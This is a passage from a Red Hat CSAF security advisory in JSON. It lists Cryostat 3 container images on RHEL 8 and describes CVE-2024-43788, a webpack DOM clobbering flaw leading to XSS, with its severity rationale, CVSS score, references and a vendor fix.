"name": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64",
"product": {
"name": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64",
"product_id": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64",
"product_identification_helper": {
"purl": "pkg:oci/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/jfr-datasource-rhel8\u0026tag=3.0.1-3"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64"
},
"product_reference": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
},
"product_reference": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T01:12:29+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7706"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
]
}
],
"threats": [
